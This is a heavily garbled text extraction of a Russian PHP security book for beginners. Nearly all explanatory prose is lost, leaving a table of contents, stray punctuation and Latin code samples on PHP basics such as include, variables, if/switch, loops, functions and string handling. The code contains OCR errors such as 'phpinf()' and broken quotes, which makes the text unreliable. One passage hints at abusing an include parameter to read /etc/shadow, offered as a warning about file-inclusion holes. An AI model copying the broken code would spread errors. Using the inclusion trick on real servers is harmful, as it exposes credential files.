Фленов PHP глазами хакера

http://www.natahaus.
ru/
!
,

.

,
.

.

.

,

,
,
e-mail -

nnu
-
-
2005
681.3.068+800.92
32.973.26-018.2
69
69
. .
. .: -, 2005. 304 : .
ISBN 5-94157-673-0
.
,
,
. Web-. - , ,
Web-,
681.3.068+800.92
32.973.26-018.2
:

. .
.
02429 24.07.00. 23.09.05.

70x100Vie. . . . . 24,51.
5000 . N1315
"-", 194354, -, . , 5.
-
N 77.99.02.953..006421.11.04 11.11.2004 .
.

" ""
199034, -, 9 , 12
ISBN 5-94157-673-0
^ " 0 "- 2<>5

, "-", 2005
3
3
1.
1.1. ?
1.2. ?
1.3. ?
1.4. ?
1.5.
1.6.
5
8
13
14
16
17
2.
19
2.1. PHP-
2.2.
2.3.
2.4.
2.4.1.
2.4.2.
2.4.3.
2.4.4.
2.4.5.
2.4.6.
2.5.
2.6.
for
while

2.7.
2.8.
2.9.
substr
19
25
29
30
31
32
34
38
39
41
42
52
52
54
55
56
58
59
64
64
_/
strlen
strpos
preg_replace
trim
2.10.
2.11.
2.12.
2.12.1.
2.12.2.
2.12.3. GET
2.12.4. POST
2.12.5.
2.12.6.
2.13.
2.13.1.
2.13.2. Cookie
2.13.3. cookie
2.14.
2.14.1.
2.14.2.
2.14.3.
2.14.4.
2.14.5.
2.14.6.
2.14.7.
2.14.8.
2.14.9.
2.14.10.
.'
65
65
67
68
68
70
71
72
73
75
78
81
83
83
85
89
94
95
96
97
97
100
101
101
10 i
105
106
107
3.
111
3.1.
3.2.
3.2.1.
3.2.2.
3.2.3.
3.2.4.
3.2.5.
3.2.6.
3.3.
3.4.
3.4.1.
3.4.2.
3.4.3.

111
117
118
118
120
121
121
122
125
129
130
134
136
136
3.5.
3.6.
3.6.1.
ereg
eregi
ereg_replace
eregi_replace
split
spliti
3.6.2.
3.6.3. Perl
3.6.4. Perl
pregjnatch
pregjnatch_all.
preg_split
3.6.5.
3.7.
3.8.
3.8.1.
3.8.2. SQL Injection
3.8.3.
3.8.4.
3.8.5.
3.9.
3.10.
3.10.1.
3.10.2.
3.10.3.
3.10.4.
3.11. Cross-Site Scripting
3.12.
3.12.1.
3.12.2.
3.13.
3.14.
3.15.
3.17.
3.18. REQUESTJJRI
3.19.
137
137
143
144
144
144
144
145
145
145
145
150
153
153
154
155
155
156
159
159
161
168
169
171
172
173
174
176
176
177
179
180
180
181
183
184
185
186
187
188
4.
189
4.1.
4.2.
190
192
_W
4.3.
4.3.1.
4.3.2.
4.3.3.
4.3.4. .
4.3.5.
4.4.
4.4.1.
4.4.2.
4.4.3.
4.5. vs.
193
193
199
201
202
204
205
205
206
209
211
5.
215
5.1.
5.2.
5.3.
5.3.1. Web-
5.3.2. Apache
5.3.3.
5.3.4.
5.3.5.
5.3.6.
5.4.
5.5.
5.5.1. DNS
5.5.2.
5.5.3.

5.6.
5.7. FTP-
5.8. ping
5.9.
5.9.1. SMTP
5.9.2. mail
5.9.3. SMTP-
5.9.4.
5.10.
5.11.
215
220
223
223
230
232
240
245
246
247
248
249
250
251
251
252
252
254
255
255
259
262
265
266
268
270
271
271
272
275
Vll_
277
1. SQL
279
279
283
2. -
285
287
289

Web- . .
?

. ,
, ,
. , ,
, "
". , , , . , , ,
.
, ,
,
. ,
.
, , . , .
" "?
? , .
, .
, , .
, , , , . ,
.

, , . ,
.
.
,
.

Perl
.
Perl ,
. -
,
.
,
. , - , , . , ,
,
. ,
.
,
.
,
. , ,
.
.

,
. , , , .
, ,
, , , ,
Unix , , Linux.
, Web- PHP- , Windows Microsoft, , ASP.
- Unix.
, .
"Linux " [1].
,
. ,
.
, ,
.
"-",
. ,
. ,
.
,
. , , .
: " , ". , , , , , .
www.cydsoft.com ,

, . , ,
. ,
, .
,
, www.vr-online.ru.
.
,
, , , ,
, .
, www.vr-online.ru.
- , .

. .

, , , ,
.
,
Web- . ,
.
1. . ,
. , ,
, . ,
.
2. . ,
, ,
. . ,

. ,
,
. ,
, , ,
.
3. . , .
.
, 2 5
.
, ,
, , ,
. .
4. . ,
, , , ,
.
5. .
. . ,
Web-.
. , (, SQL Injection), , .
I/
, ,
: " ". , - ,
.
, ,
-
.
, . , . ,
, , .
1.1. ?
, ,
. , , ,
Web- Web-, . "" , .
.
"" , ARPANET. , .
, "" . , , , "". .
FIDO.
UNIX- , .
, . -
. .
,
, . , - .
, . , , , , () . ,
. , . ,
, , (
!).
, , , , crack
() .
, , , , , .
,
. ( ), .
.
, .
,
.
/ " "
, , , - , .
.
. .
,
. ,
.
,
,
. Open Source , , , , . . .
, - . , ,
, .
, .
. , .
,
.
, , , , , .
, .
,
- .
, , ,
,
.
, , .
. .
, . ,
.
.
, , , . ,
" Delphi " [4] " C++ " [3]. ,

.
1.2. ?
, . ,
, .
.
( ). . (, UNIX)
( Web-). .
,
.
1. .
,
"" .
?
. ,
""
. ,
, , . ,
. i
.
. , . , , , ,
,
.
. /
" " <Ctrl>+<O/<Ctrl>+<V>
<Ctrl>+<Ins>/<Shift>+<Ins>, ( ,
).
Windows (
, ) , , .
, , . , " ".
.
( 20 000 ). -
.
.
" ", 25 . " "
, 20 . .
2. , . , ,
. , .
, ,
, , .
, !!!
, , - .
-
. ,
.
3. . , , . .
Borland Delphi C++.
Borland Delphi , , , ,
. C++ , . ,
. ,
Basic (, ,
). Visual Basic ,
,
, . ,
,
. - .
,
. ,
, ,
, , .
, , - .
, ,
, . ,
. .
, Borland Delphi,
, .
.
10
4. . .
, .
. , - .
,
. , ,
, . .
. : "", "" .
- , . ,
, -.
,
. -
, , , . ,
, .
: .
.
- . , ? .
.
. ,
. , , ,
.
,
. . , "" ,
. "" ,
, Crack
,
. , .

, , .
. -
11
, . , - ( )
, , .
5. . , ,
Windows
.
,
.
, , , Windows . ,
, Windows, , , .
- ,
, Netscape Navigator.
Microsoft Netscape , Microsoft , , .
?
, Internet Explorer .
Microsoft , . ,
.
6. .
. . , - , , .
, .
, , ( !). , . ,
, .
7. , . , . . .
. .
- , .
, . .
12_
, ? :
, . ,
, . , , - .
, .
.
, . ,
.
8. , ? , , , ,
. ,
, , .
,
.
,
.
,
, . .
, .
- , .
(, ). , , ,
. ,
, ,
. ? ,
.
.
,
, . , . . .
, "", "".
, . "". ,
.
Web- :
Web-, .
,
. , ;
13
, .
Web Unix,
,
;
. , , .
. ,
, . ( Web MySQL) SQL (Structured Query
Language, ),
. SQL
SQL Injection ( SQL), .
1.3. ?
PHP (Personal Home Page Tools,
) ,
HTML- Web-. Web Web-.
, Microsoft Active Server Pages (ASP), Macromedia
ColdFusion Sun Java Server Pages.
" ASP" "ASP ". , ,
Java Server Pages, , ASP
.
Web- , .
Web- (IIS, Apache)
(Windows, Linux . .).
Apache Web Server. Web-,
( ,
). ? , PHP-
Web-,
. Apache Windows, Mac OS X Unix-
.
HTML, .
14
HTML, , ,
, . , , .
, , (, , ).
, . .
- Web-
.
( !.
.
MySQL.
,
.
1.4. ?
"" ? Web, PHP- ( 1.1).
I 1.1. -
<HTML>
<HEAD>
<TITLE> Test page </TITLE>
</HEAD>
<BODY>
<?php
$title='We are glad to see you again1;
<P>Hello. <?php echo $title ?>
<P>Current time <?php echo date('Y-m-d H:i:s') ?>
</BODY>
<HTML>
1.1 \Chapter1\embadded.php
-, .
15
PHP <?php ... ?>.

, ,
.
. Web-,
, . 1.1.
' Test page - Flenov Internet Explorer
File
dit
View
Favorites
Tools
yelp
' Search
-Favorites
* Media
Links j
Address j ' g j http://www.vr-online.ru/php/chaptet1/embadded.php
Hello. We are glad to see you again

Current time 2004-09-30 13:16:42
JLJ
ij My Computer
I Done
. 1.1. ,
.
| HTML (View | Source).
, :
<HTML>
<HEAD>
</HEAD>
<BODY>
<P>Hello. We are glad to see you again<P>Current time 2004-09-30
13:16:42</BODY>
<HTML>
, PHP- . .
,
HTML-, , . ,
16
PHP-
HTML. :
,
HTML- ;

;
HTML-, ,
HTML;
Web- ( ),
-.
, HTML-, . , (, Perl), . , HTML- .
( HTML , Perl). , ,
.
. , ( ), " ". , , , -
100 . , .
, " ".
.
, .
. , HTML-.
, .
1.5.
Web-.
(JavaScript, VBScript, Java-, DHTML . .),
HTML- (Perl, ASP,
).
17
. ? , , .
JavaScript.
, ,
Web-. , , , JavaScript
. ,
, .
JavaScript, .
,
.

HTML- . , , .
. , .
1.6.
,
.
PHP- , .
Web-,
, , . , , Web-.
, ,

.
MySQL, .
,
, Web-.
- ,
Web, MySQL.
.
. -
18
, . .
,
, .
, , :
http://www.php.net/downloads.php .
http://www.mysql.com/ MySQL.
http://www.apache.com/ Web- Apache.
,
.
Linux, , ,
, , .
, MySQL Linux
.
Windows, Web- Windows 2000/XP MS Internet Information Server.
.
Windows IIS,
,
Windows Internet Information Server.
Windows . .
, Web- , . IIS
Inetpub\wwwroot . , http://127.0.0.1/filename.php (filename.php
), .
Pentium III (566 ), . Linux
( ) Apache, MySQL .
, Linux, , Windows. ,
.
,
.
MySQL.

. ,
. , .
, .
, - .
. ,
, .
, , , , ,
.
, . , . ,
. , .
,
. .
, Web- .
2.1. -
, - HTML-.
Web- HTML- PHP-,
? HTML? .
20
,
. HTML-.
-
:
<?php

?>
, <?php ?>,
PHP- .
HTML-
.
, , . , ,
. , <?php ?>
. PHP- .
. ,
, , .
, PHP-.
:
<?

?>
,
.
--enable-short-tags php.ini ( )
short_open_tag on.
, short_open_tag ,
XML, . .
XML .
,

.
<? ?>,
SGML . ,
,
, (
21_
,
INI ).
, .
:

%>
, ,
ASP. ,
(ASP ), .
:
<SCRIPT LANGUAGE="php">

</SCRIPT>
HTML, ,
. -
,
LANGUAGES php"
LANGUAGE= "VBScript". ,
VBScript , .
- . , , - .
information.php ( 2.1).
| 2.1.
<HTML>
<HEAD>
<TITLE> Test page </TlTLE>
</HEAD>
<BODY>
<?php
print("This is information about PHP<P>");
22
phpinf();
</BODY>
<HTML>
2.1
\Chapter2\information.php -, .
FTP- Web-
,
. .
,
http://www.server.com/information.php,
server.com
.
http://127.0.0.1/information.php. . 2.1.
5 Test page - Microsoft Internet Explorer
-^
" "i}
'^
| http://l92.168.8.57/information.php
System
Windows NT MIHAIL 5.0 build 2195
Build Date
May 28 200315-06:05
Server API
ISAPI
Virtual Directory Support
enabled
Configuration File (phpjrii) Path
CWVINNTiphpjni
PHP API
20020918
PHP Extension
2002042S
Zend Extension
20021010
Debug Build
no
Thread Safety
enabled
Registered PHP Streams
php, http.ftp, compress.zlib
This program makes use of the Zend Scripting Language Engine.

Zend Engine v1.3.0, Copyright (c) 1998-2003 Zend Technologies
. 2 . 1 .
23_
, . , . <?php ?> :
print("This is information about PHP<P>");
phpinf();
p r i n t o .
- . ,
HTML,
, PHP-. , .
PHP- ,
. p r i n t o
, .
. , , , HTML- <>,
. , HTML-, .
phpinf (). , (. . 2.1). , .

HTML. , HTML-
PHP-, 2.2.
| 2.2. HTML
<HTML>
<HEAD>
<TITLE> Vision </TITLE>
</HEAD>
<BODY>
<P> Hello
<P> <?php $i =1; print("This is PHP");?>
<P> i = <?php print($i) ?>
</BODY>
<HTML>
24
2.2 \Chapter2\info.php
-, .
PHP-, HTMI. ,
.
. PHP-
$i, 1. ?
, ( )
(, . ., ).
$. , $i
1.

$i. , ,
. 2.2.
, $i 1,
, ,
. -,
. , .
.
I Vision - Flenov Internet Explorer
j File
|dit
View
Favorites
X |
Tools
21
I'
Help
, ' Search s '''Favorites
t^M Media
-ff*} |
) iLinksi
i Address |.g] about:blank
Hello
This is PHP
J
. SJ Done
C Internet
. 2.2.
jj
PHP
25
2.2.
. , ,
.
.
, , Windows.
, (, ,
, ) / .
. , OpenGL ,
- .

. , ,
, .

, ,
OpenGL.
Web- .
,
. ,
.

.
PHP- Web-.
include (), :
include(' /filepath/filename') ,1
include_once('/filepath/filename );
require('/filepath/filename');
require_once('/filepath/filename');
.

i n c l u d e () / i n c l u d e _ o n c e () r e q u i r e () / r e q u i r e _ o n c e ( ) . -
. (, )
.
2 . 1315
26
required/require_once
.
include()/require() include_once()/require_once() , , . , ,
.
PHP- ( ), .
include_once() r e q u i r e _ o n c e () ,
, .
, include_once ( ) r e q u i r e _ o n c e ( ) He ,
. .
. ,
l.php 2.php. .
l.php 2.php? , l.php, 2.php,
2.php, .
,
include_once
r e q u i r e _ o n c e .
l.php,
.
?
require () require_once () ,
.
. ,
, . ,
- .
include () . ,
, .
(, . .), .
( .). ,
. , , .
include().
, . (
header.inc) , 2.3.
PHP
27
2.3.
<HTML>
<HEAD>
</HEAD>
<BODY>
<CENTER><H1> Welcome to my home page.</Hlx/CENTER>
< ! Here you can insert page menu, links >
< P x a href ="http: / /www. cydsof t. com/ ">Home</a>
<a href="http://www.cydsoft.com/products">Products</a>
<a href="http://www.cydsoft.com/register.php">Purchase</a>
<a href="MailTo:info@vr-online.ru">Contact Us</a>
<HR>
header.inc \Chapter2\ -, .
( footer.inc) :
<P><HR>
<CENTER><I> Copyright Flenov Mikhail</Ix/CENTER>
</BODY>
<HTML>
footer.inc \Chapter2\ -, .
, ( 2.4).
'
'
""'
"
" " "
'
'
"'"
"
2.4. ,
<?php include('header.inc'); ?>
<PxB> Site news</B>
<LI>CyD Organizer 1.2 now available.
'
"
' " ' " " }
28
<Ll>Use the CyD Virtual Desktop to organize a busy desktop, save your
time, release your work and keep the applications in order.
<LI>Use the CyD Virtual Desktop to organize a busy desktop, save your
time, release your work and keep the applications in order.
<LI>New Java Applets. A Christmas gift from CyD Software Labs. Generates
real looking snow that falls over your picture. And best of all, it is
totally free! Have fun!
<?php include('footer.inc'); ?>
2.4 \Chapter2\index.php
-, .
. . 2.3.
'3 Test page - Microsoft Internet Explorer
'
* Q
jjij) JJS I '
^ j
j | g ] htcp;//127.0.O.l/index.php
j j
^ I j
Welcome to my home page.

Home Products Purchase Contuct Us
Site news
CyD Organizer 1.2 now available.
Use the CyD Virtual Desktop to organize a busy desktop, save your time, release your work
and keep the applications in order.
Use the CyD Virtual Desktop to organize a busy desktop, save your time, release your work
and keep the applications in order.
New Java Applets. A Christmas gift from CyD Software Labs. Generates real looking snow that
falls over your picture. And best of all, it is totally free! Have fun!
Copyright John doe
ff
. 2..
,
.
. , ,
29_
. , 100 . HTML
100 . , .
, HTML.
, PHP-, .
HTML, ,
PHP-, <?php ?>.
PHP-,
<?php
?> . , , . , , , HTML-,
, , .
.
.
. ,
,
, . ,
. . , , ,
URL- :
http://www.sitename.com/index.php?file=main.html
, , . main.html,
URL .
/etc/shadow?
, ,
. ,
. 3.4.1 ,
,
include.
2.3.
p r i n t (), , .
,
30
, , . .
, / :
echo p r i n t . echo:
echo("Hello, this is a text");
echo "Hello, this is a text";
, . ,
, . , , :
echo("Hello, this is a text", "This is a text too");
echo "Hello, this is a text", "This is a text too";
p r i n t () , , . 1, , , 0. , . .
.
p r i n t ():
print("Hello, this is a text");
2.4.
- (C++,
Delphi), , , .
,
,
. - ( ).
, , -
, ,
. , , . (
PHPNuke.) - .
, Java Perl,
, C/C++.
31
2.4.1.

C/C++ Java. . ? ,
. ,
,
. .
.
// ( C++) # ( Linux), ,
, . :
<?php
#
//
This is code //
?>
,
, PHP-. ,
. .
.
, , , - . /*
*/. :
<?php
/*

*/ ,
?>
,
. HTML, , HTML
.
. , , ,
32_
. .
, ,
, , .
,
. , , , ,
- - .
, .

.
2.4.2.
, . ,
, . :
<?php
$index = 10;
$index
10
20;
$index=10+10;
$index=
10
10;

(,-).
.
, - , ,
.

.
.
. , , ,
33_
. -
. :
<?php
$ index = 10;
$Index = 20;
print($index);
print($Index);
?>
10, 20, $ index $ index - . ,

.
10,
20, .
, . , :
<?php
Sindex = 10;
print($Index);
?>
$index 10, $mdex. - , ,

$index, , ,
, .
, .
.
.
.
. ,
if () 1 else 2, ,
, 1, 2.
,
,
. , :
<?php
$index=l;
if
($index==l)
34
print('true');
else
print('false');
?>
,
:
<?
$index=l;
If ($index==l)
print('true');
ElsE
print('false');
?>
if else ,
. /, . , ,

,
.
2.4.3.
,
, -
. , ,
,
. :
($), , ;
, ;
, C++
Delphi, , , . .
. ,
;
. .
PHP
35_
$, , . $ . , .
$paraml, $param2, $param3 . ,
, $param2, .
.
, - - ,
$sum. (
, ),
$i. .
. , , :
$ = ;
, . . , , .
:
$str = ' ';
$str = " ";
? , $ index. , :
$index = 10;
$str = 'Index = $index';
$str = "Index = $ index ",
$str,
mdex=$index, index = .
, , . . . , , , .
, ,
, . .
- , .
36_
,
, .
:
$str = "This is a string.
PHP is a next generation of WEB programming.
You will like t h i s " ;
, .
: . ,
.
,
, , ,
, .
.
?
true, . . ( , 1), false, . . (, ). ,
. ,
if. .else, - . true
false. , , .
- , , . , ? . ,
, ,
0. ,
.
, ?
isSet(MMH ). , ,
true, false. , 2.5.
'
2.5.
<?php
if
(IsSet($index))
print(' ');
//
else
print(' '); //
PHP
37_
$index = 1;
if (IsSet($index))
print(' ');
else
//
print(' '); //
, $ index .
. ,
.
,
, , :
$index = 1 ;
//
$fl = 3.14;
//
$str = ' ';
//
, . :
$Str = '10';
$index = 2 * $str;
, . 1
$str, .
2 $str. ,
, . , $str , , . $ index 20.
$str = 1 ;
$index = 2 * $str;
print(" = $index");
.
, ,
: " = 20".
.
, , , .
, . :
$str = 'rlO';
$index = 2 * $str;
print("Result is $index");
38
$str ,
, . . . 2
, 2 0. .
:
print(3*"hello"+2+TRUE);
, ?
, ,
. 3 . , 0. 3,
0, 0. 2. 2. 2 (
true). ? ,
. true
2 ( ) 1. 3. .
, . , . , , .
.
2.4.4.
, -
. :
+ ()
- ()
* ()
/ ()
, ().
, .
:
$index
= 2 + 2 * 2 ;
, . , : 8. , , , 8. 3- , , .
39_
, 6, ( 4), 2 ( = 6).
, .
, ,
, :
$index = ( 2 + 2 ) * 2;
8.
, . :
$index = ( 2 + 2 * 2 )
* 3;
,
6, .
6 3.

1,
. : $++,
$. :
$index = 2;
$sum = $index++;
$sum 3 ( 2 $index, 1).

, . ( ).
, . :
$strl = " ";
$str2 = "";
$str3 = $strl.str2;
$ s t r i $str2, $str3 , . . : "

".
2.4.5.
, . . , . .
40
, - . , , .
,
.
2.1,
HTML , PHP-, , 2.6.
| 2.6. PHP-
<HTML>
<HEAD>
<TITLE> Vision </TITLE>
</HEAD>
<BODY>
<P> Hello
<P> <?php $i =1; print("This is PHP");?>
<P> i = <?php print($i) ?>
</BODY>
<HTML>
, . . 1.
index.php download.php, $ index
index.php, .
$ index download.php, .
, :
GET POST ;
;
cookie,
;
PHP
41

, , .
? .
, .
,
. , ,
. , .
(
) .
2.4.6.
, . .
.
-
. , 640 . PHP- 640,
800
, , 640, , - .
, 640,
, ,
.
,
- .

, PHP- .
, .

,
. ,
, . , .
, , $. , ,
. , ,
42
, , . define (),
,
. , ,
Pi. :
define P I ' , 3.14);
$index = 10 *
3,14;
print($index);
P I , 3,14. 10 $ index. .
, , :
define('PI',
PI
3.14);
= 10 * 3 , 1 4 ;
2.5.

, - , .

. , .
, ,
. .
? :
, ;
.
,
.
, e-mail. :
e-mail , ;
.
, : ,
, .
,
PHP
43_
. ,
:
if ()
1;
else
2;
, , , 1,
2, :
$index = 0;
if
($index > 0)
print("Index > 0") ;

else
print("Index = 0") ;
: $ index , , , else.
, .
, .
{}. , :
$index = 0;
if ($index > 0)
print("Index > 0");
$index = 0;
else
$ index ,
. ,
. :
$index = 0;
if ($index > 0)
{
print("Index > 0");
$index = 0;
}
else
print("Index = 0");
44_
else . , :
$index = 0;
if ($index > 0)
{
print("Index > 0") ,$index = 0;
}
else
{
$index = 1;
}
else ,
.
:
$index = 0;
if ($index > 0)
print("Index > 0");
, $ index .
, . . , , ,
. else, if. ,
, . , , else
if. ,

. :
$ index = ,if ($index > 0)
{
if ($index > 10)
$index = 10;
else
$index = 0;
PHP
45_
else
{
print("Index = 0");
$index = 1;
, if else , . , , .
, Delphi.
3000 ,
. ,
, , if . :
$index = 0;
if ($index > 0)
{
if ($index > 10)
$index = 10;
else
$index = 0;
}
else
{
print("Index = 0");
$index = 1;
}
? . 10
?
.
,
, (. . 2.1).
2.1.

1 > 2
( ),

1 >= 2
( ),

46
2.1 ()

1 < 2
( ),

1 <= 2
( ),

1 == 2
( ),

1 === 2
( ),

1 != 2
( ),

?
.
. 2.2.
2.2.

1 and 2
( 1 & & 2
1 or 2
( 1 || 2 )
1 2
, . .
, "!"

:
$indexl = 0;
$index2 = 1; .
if ($indexl > index2 and $index2 = = 1 )
print("Indexl Index2 Index2 1");
else
print("Indexl Index2 Index2 1");
PHP
47
, ,
1 10:
$index = 0;
if ($index >= 1 and $index <= 10)
print("Index 1 10");
,
. ,
. . if. .else, - ,
.
. ,
.
:
$result = $indexl > $index2
? indexl : index2;
? :
? 1 : 2;
, 1, 2. , $indexi ,
, $index2. , .

- ? , $day 1 7,
, . ( 2.7).
| 2.7.
$day = 2,($day == 1)
if
print("");
else
if
($day == 2)
print("");
else
if
($day == 3)
print("");
48
else
if ($day == 4)
print("") ;
else
if ($day == 5)
print("") ;
else
if ($day == 6)
print("");
else
if ($day == 7)
print("") ;
,
, . i f . . e l s e i f ,
, 2.8.
! 2.8. i f . . e l s e i f
$day = 2;
if ($day == 1)
print("");
elseif ($day == 2)
print("");
elseif ($day == 3)
print("");
elseif ($day == 4)
print("");
elseif ($day == 5)
print("");
elseif ($day == 6)
print("");
elseif ($day == 7)
print("");
. i f . . e l s e i f
:
if (1)
!;
PHP
49
elseif (2)
print(2) ;
, , .
, .
if:
if ()
1;
2;
endif
, ,
, endif.
switch.
:
switch ()
{
case 1:
1;
break,-
case 2:
2;
break;
[default: ]
}
,
case. 1,
break. , . if (
), .
, , default.
,
- . ,
, .
50
, ,
, switch ( 2.9).
i 2.9. switch
$day = 4;
switch ($day)
{
case 1:
print("");
print(" ");
break;
case 2:
print("");
break;
case 3:
print("");
break;
case 4:
print("");
break;
case 5:
print("");
print(" ");
break;
case 6:
print("");
print("");
break;
case 7:
print("");
print("");
break;
. case
, , . .
1, 5, 6 7- , ,
. ,
PHP
51_
, ,
.
( 2.10).
I 2.10. switch
$day = 4;
switch ($day) {
case
case
case
case
case
1:
2:
3:
4:
5:
print(""); break;
print(""); break;
print(""); break;
print(""); break;
print(""); break;
case 6: print(""); break;

case 7: print(""); break;
default: print("");
,
. ,
,
. default
.
break . , ,
. . ,
,
1 5. :
$sum = 1;
Si = 3 ;
switch (Si) {
case 5: $sum = $sum
case 4: $sum = $sum
case 3: $sum = $sum
case 2: $sum = $sum
*
*
*
* Si;
case 1: $sum = $sum *
default : print($sum);
$i 3.
. , .
52
case 5 4 , 3,
. 3
$sum, 1, $sum. break, case, 2,
. $sum ( 3) 3,
9 $sum. break, case , $sum ( 9)
3. 27, , break, , , default.
, break , . , .
case. , break .
, .
, , switch .
2.6.
. ,
,
switch, ,
. 3- 2,
: 2*2*2. 2 '1
. , ,
, ? , .
for
for. , . :
for ( ; ; )
, :
$sum = 1;
for
($i=l; $i<=3; $i=$i+l)
PHP
53_
$sum = $sum * 3;
print($i);
$i,
1. ,
3. , , p r i n t (),
. $i
($i=$i+i).
: $sum = $sum * .
1 3, .
for .
, , . , . :
$sum = 1;
for ($i=l; $i<=3; $i=$i+l)
{
$sum = $sum * 3;
print(" = $sum, = $i <BR>");
}
:
= 3, = 1
= 9, = 2
= 27, = 3
3 .
.
, $sum for :
for ($sum=l, $1=1; $i<=3; $i=$i+l)
{
$sum = $sum * 3;
print(" = $sum, = $i <BR>");
}
.
.
, , $i 3, 100.
:
for ($sum=l, $i=l; $i<=3, $sum<100; $i=$i+l)
54
$sum = $sum * 3;
print(" = $sum, = $i <BR>");
}
, :
$i<=3 $sum<ioo. "" (or) :
for ($sum=l, $i=l; $i<=3 or $sum<100; $i=$i+l)
, ,
:
for ($sum=l, $i=l; $i<=3 and $sum<100; $i=$i+l)
.
, , 100. ? , . 3
4- 81. 100,
( ), 243,
. , . , , . . :
for ($sum=l, $i=l; $i<=3, $sum<100; $i=$i+l, $sum = $sum * 3)
print(" - $sum, = $i <BR>");
$i, $sum. ,
, 100.
while
while " , ". :
while ()
;
, ,
, . 3 3 while:
$i = 1;
$sum = is
while ($i<=3)
{
$sum = $sum * 3;
PHP
55_
$i = $i + 1;
}

. , .
?
while:
do
while ();
, .
, . :
$1 = 1;
$sum = 1;
do
{
$sum = $sum * 3;
$i = $i + 1;
}
while ($i<=3)
while:
while ()
1;
2;
endwhile
, ,
, endwhile.

, .
while
:
w h i l e (TRUE)
, , ,
.
56
for . :
for
(;;)
, .
. ,
,
, .
, . ( 30 ).
,
- - ( ) , .

. , .
break. :
$index=l;
while ($index<10)
{
print("$index <BR>");
$index++;
if ($index==5)
break;
}
, $ index
10. :
5, break. , 5.
-
- ? continue.
:
$index=0;
while
($index<10)
PHP
57
{
$index++;
if ($index==5)
continue;
print("$ index <BR>");
}
1 9,
5. $ index 0. 0, 1?
1, , . . 0 1, .
$ index 5, , continue, .
continue.
:
$index=l;
while ($index<10)
{
if ($index==5)
continue;
print("$ index <BR>");
$index++;
}
, , , , . $index
1,
. 5,
. .
( $ index
5), 5 . , "",
.
for,
,
:
for ($index=l; $index<10;
{
if
($index==5)
continue;
3 . 1315
$index++)
58
p r i n t ( " $ i n d e x <BR>");
}
for $ index :
for
($index=l; $index<10; $index++)
{
if ($index==5)
$index++;
print("$index <BR>");
}
,
. ,
. , . , .
, continue,
.
2.7.
, .
, - ,
. ,
, .

. ,
.
exit .
, . , , .
die (),
e x i t o , die , . :
if(!connect_to_database)
die(" , ");
connect_to_database
. ,
PHP
59_
. ,
, d i e o , .
.
, , , .
.
.
, ,
MySQL ,
10-15 .
, , .
die () . , . , Web-
, :

if(!connect_to_database)
{
print(" , ");

exit;
}
,

.
2.8.
Pascal,
, . ,
- . . , 2.11.
| 2.11.
print(" <BR>");
print("===========================<BR>");
60
print(" <BR>");
print("===========================<BR>");
print("===========================<BR>");
print(" <BR>");
print("===========================<BR>");
print("===========================<BR>");
print(" <BR>");
print("===========================<BR>");
,
. .
. 20
3 , 10?
, .
, - !!! 20
. , .
. :
function (!., 2, ...)
{
1;
2;
, . ,
:
function PrintMenu($name)
{
print("===========================<BR>");
print("$name <BR>");
print("===========================<BR>");
}
, ,
, p r i n t <).
PHP
61_
, :
$mname = "";
PrintMenu( Surname) ;
PrintMenu("") ;
PrintMenu("");

$mname, . . , , , .
, , ,
, , p r i n t ,
. , ,
. ,
.
? , , () (
). .
, . ,
.
.
, ,
, . , .
,
.
? .
, , .
, .
, ,
. ,
. , . , ,
_&?
. -
, ,
, .
,
. ,
.
, , .
. ,
,
3. :
function PrintMenu($number)
{
print($number*3);
}
, .
10
p r i n t ($number*3), . , 3 4. ,
, .
, ,
. ,
. , ,
, , , . , ( 3
).
,
. 2.12.
2.12.
<HTML>
<BODY>
<?php
function print_max($numberl, $number2)
PHP
63_
print ("$numberl > $number2 = " ) ;

if ($numberl>$number2)
print ("true <BR>");
else
print ("false <BR>");
print_max(10, 435);
print_max(3240, 2335);
print_max(sdf2 3, 45);
print_max(45) ;
?>
</BODY>
<HTML>
print_max(). : $numberi $number2. ,

true, false.
4 . , .
, ,
:
435 > 10 = true
2335 > 3240 = false
45 > sdf23 = true
Warning: Missing argument 2 for print_max() in /var/www/html/1/index.php
on line 10
45 > = false
, . , ,
, . , .
, .
, . , . , , . ,
false. ,
.
64
45 0, , ,
true. .
, . .
. , .
,
print_max() :
print_max(10, 20);
print_max(20, 10);
,
false ( ), true ( ).
2.12 \Chapter2\functions1
-, .
2.9.
,
.
, , .
, , .
substr
.
s u b s t r ( ) :
string substr(string string, int start [, int length])
:
, ;
, ;
,
, .
, ,
s t a r t .
PHP
65_
..
,
. substrO
. ( 2.13).
{ 2.13. substr
!...; 1
:
:
<?php
// 1
$Sub_string = substr("Hackish PHP", 8, 3 ) ;
print($Sub_string);
print("<br>");
// 2
$Sub_string = substr("Hackish PHP", 8);
print($Sub_string);
print("<br>");
// 3
$Sub_string = substr("Hackish", 0, 4);
print($Sub_string);
"Hackish PHP" ,
8- . , . "".
, ,
"Hackish" "Hack".
strlen
.
, , .
strpos

.
strops (), :
, ;
, ;
66
, ( ).
, , .
. , ""
"Hackish PHP Pranks&Tricks". :
$index = strpos("Hackish PHP Pranks&Tricks", "PHP");
, $ index 8, "" , 8- .
. , .
. ? :
$index = strpos("Hackish PHP Pranks&Tricks", " " ) ;
$ index
7. ? , , 8- . :
$index = strpos("Hackish PHP Pranks&Tricks", " ", $index+l);
, . $ index
( 7 ), 1.
strpos () ,
, .
, , , . , , ,
.
, , . :
<?php
$start = -1;
$text = "Hackish PHP Pranks&Tricks";
while ($start<>0)
{
$end = strpos($text, " ", $start+l);
if ($end==0)
$word = substr($text, $start+l, strlen($text)-$start-l);
else
$word = substr($text, $start+l, $end-$start-l);
PHP
67_
print("Word: $word; <BR>");

$start = $end;
$start, . 1.
,
. $start+i.
0, ,
.
$end. ,
1. , $ s t a r t $end 1.
1? . , ,
, . HTML-
, , . . , ,
, . , :
Hackish
PHP
Pranks&Tricks
,
, ,
. .
preg_replace
preg_repiace ()
.
3.6. :
mixed preg_replace (
mixed pattern,
mixed replacement,
mixed subject
[, int limit])
, , . , :
pattern , ,
;
68
replacement
;
subject , ;
limit ,
.
,
.
, . , "/" "i". , "//i".
"world" "Sam"
:
$text= "Hello world from PHP";
$newtext = preg_replace("/world/i", "Sam", $text);
echo ($newtext);
preg_repiace () , .
, ,
.
trim
,
, . :
$text = trim("
Hackish PHP Pranks&Tricks
") ;
2.10.
, .
, .
, .
, , .
"", "" "":
$goods[]= "";
$goods[]= "";
$goods[]= "";
PHP
69_
, ,
. :
print("<P> $goods[0]");

, , . . :
$goods[0]= "";
$goods[l]= "";
$goods[ 2 ] = "";
, , . . :
$goods[3]= "";
$goods[9]= "";
